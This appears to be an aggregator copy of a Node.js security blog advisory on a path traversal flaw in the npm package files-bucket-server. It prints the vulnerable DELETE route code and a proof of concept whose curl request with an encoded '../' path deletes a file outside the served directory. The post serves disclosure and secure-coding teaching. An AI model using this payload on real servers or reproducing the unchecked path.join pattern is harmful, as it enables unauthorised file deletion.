惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

J
Java Code Geeks
F
Fortinet All Blogs
Martin Fowler
Martin Fowler
M
MIT News - Artificial intelligence
G
Google Developers Blog
P
Proofpoint News Feed
Recent Announcements
Recent Announcements
MyScale Blog
MyScale Blog
D
DataBreaches.Net
Stack Overflow Blog
Stack Overflow Blog
月光博客
月光博客
爱范儿
爱范儿
罗磊的独立博客
腾讯CDC
Hugging Face - Blog
Hugging Face - Blog
博客园 - 叶小钗
Vercel News
Vercel News
酷 壳 – CoolShell
酷 壳 – CoolShell
B
Blog
C
Check Point Blog
美团技术团队
宝玉的分享
宝玉的分享
Microsoft Security Blog
Microsoft Security Blog
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻

NodeJS Security & NodeJS Secure Coding's Blog

Hardening Your npm and pnpm Configs in the Age of Shai-Hulud Argument Injection vulnerability in git-blame@1.4.0 Argument Injection vulnerability in `gits@0.1.8` Command Injection vulnerability in `@fab1o/git@1.4.0` Command Injection vulnerability in `git-contributors` via unsanitized CLI arguments Command Injection vulnerability in `git-q@0.0.3` Command injection vulnerability via unsanitized CLI arguments in touxing/fast-git-clone Command Injection vulnerability in `willitmerge@0.2.1` A Directory Traversal Vulnerability I found in Mastra AI Frameworks MCP Server Mastering NPX: A Cheatsheet for npm and Node.js Power Users Mitigate Supply Chain Security with DevContainers and 1Password for Node.js Local Development The Tale of the Vulnerable MCP Database Server Bad Security Defaults in Mastra AI Frameworks Templates SQL Injection and Bypassing "Read-Only" Mode in Xata's MCP Server Security Advisory for qix npm supply-chain compromise affecting debug and billions of weekly download users How to Mitigate SQL Bypass in MCP Servers Enhancing MCP Server Security: A Guide to Using execFile Argument Injection Vulnerability in ggit How to Bypass Access Control in PostgreSQL in Simple PSQL MCP Server for SQL Injection Command Injection Flaws in ggit: Unveiling a Vulnerability Command Injection Vulnerability in Create MCP Server STDIO Tool Exposes System Monitoring Functions GitHub Kanban MCP Server Command Injection Vulnerability Threatens Developer Workflows Critical Command Injection Flaw in iOS Simulator MCP Server Exposes Development Environments Command Injection Vulnerability Discovered in Codehooks MCP Server: A Critical Security Analysis SSRF Shenanigans in safe-axios: Redirects Open the Backdoor SSRF Vulnerability in safe-axios: Unintended Public Address Classification Bypassing SSRF Safeguards in ssrfcheck: A Case of Incomplete Denylists Don't Be Fooled by Multicast, SSRF Bypass in private-ip Node.js Authentication from Lucia to Better Auth Bypassing SSRF Protection in nossrf: When Your Safeguards Become Loopholes
Node.js API Security Vulnerabilities with Path Traversal ...
2025-03-29 · via NodeJS Security & NodeJS Secure Coding's Blog

Hey folks, heads up! I recently dug into a gnarly path traversal vulnerability in a popular npm package called files-bucket-server. This one’s a doozy, so buckle up and let’s dissect it.

What’s files-bucket-server?

The [files-bucket-server]() npm package acts as a mini file server. It lets you programmatically serve files from local directories, making it super convenient for specific use cases. Not terribly popular at 1 weekly download, but hey, it’s out there and there’s a bunch of security learning we can benefit from this.

The package offers two main ways to interact with files:

  • Web Server: This spins up a web server that serves files from a designated directory as static assets.
  • RESTful API: This provides an API for accessing and deleting files programmatically.

Now, the catch…

The Insecure Code That Leads to Path Traversal

Can you spot the API security, or shall I say, API insecurity, in the following code snippet:

self.server.app.delete('/api/files/:filename', function (req, res) {

var filePath = path.join(self.workspacePath, req.params.filename);

try {

if (!fs.existsSync(filePath)) {

res.status(404);

res.send('Not found');

res.end();

return;

}

fse.removeSync(filePath);

res.status(200);

res.send('Deleted!');

res.end();

} catch (err) {

res.status(500);

res.send(err);

res.end();

}

});

The Vulnerability: Sneaking Through Directories

The vulnerability lies in the way files-bucket-server handles file deletion via the API. It turns out the package doesn’t properly sanitize user-provided file paths. This means a malicious actor could craft a specially encoded path that escapes the intended directory and traverses the filesystem, potentially accessing sensitive files.

Here’s the gist: imagine the package expects a file named image.jpg within your designated directory. An attacker could send a request to delete something like ../../../../secret_data.txt instead. By cleverly using ../ characters (think “go up one directory level”), they could potentially access your secret data file even though it’s outside the intended directory.

What sort of API payload can we send to the DELETE file route to exploit this vulnerability?

FAQ: Path Traversal Explained

Question: What’s path traversal?

Answer: Path traversal is a vulnerability that allows attackers to access files or directories outside of the intended location. They achieve this by manipulating the path used by the application to access files.

Question: How does sanitization help to prevent Path Traversal?

Answer: Sanitization involves cleaning user-provided input to remove harmful characters or code. In this case, sanitizing the path would prevent attackers from injecting ../ characters and escaping the intended directory. That said, the correct security control would be to construct a path in a secure way that results in a canonical path that is within the intended directory.

Vulnerable Versions and Proof of Concept (PoC)

Bad news: All versions of files-bucket-server, up to and including version 1.2.6, are vulnerable.

The good news? I’ve included a PoC (Proof of Concept) in the code snippet below. This demonstrates how an attacker could exploit the vulnerability. Please note: This is for educational purposes only! Don’t go poking holes in your production systems, or others.

Path Traversal Proof of Concept

  1. Install the files-bucket-server package:

npm install files-bucket-server

  1. Create a new directory:
  1. Add a file to the directory and also create a file outside in the root directory:

echo "This is a generic file, hello world" > private-files/hello.txt

echo "This is a secret file" > secret.txt

  1. Define a server.js file with the programmatic API of files-bucket-server that also restricts access to a specific directory (yet fails to do so):

var FileBucketServer = require('files-bucket-server');

var fBServer = new FileBucketServer('./private-files', { logsEnabled: true });

// Only allow local requests

fBServer.onlyAllowLocalRequests();

// Start server

fBServer.start().then(function (serverData) {

console.log('Server is up at port: '+serverData.port);

});

  1. Run the server
  1. Access a file inside the directory to ensure everything is working as expected:

curl "http://localhost:1024/files/hello.txt"

  1. Now, attempt to delete a file outside this directory using the RESTful API:

curl -X DELETE "http://localhost:1024/api/files/%2e%2e%2fsecret.txt"

  1. The file secret.txt will be deleted, proving the path traversal vulnerability.

Staying Safe: Patch Early, Patch Often

The fix for this vulnerability is simple: upgrade to the latest version of files-bucket-server once it’s patched!. Will it be patched, though? How old is this library? That’s one of the tricky parts about relying on open-source dependencies.

In the meantime, be extra cautious about user-provided file paths and consider implementing additional security measures on your server-side code.

Remember: Responsible disclosure is key! Let’s keep the web a safer place for everyone.

Stay tuned for more security adventures!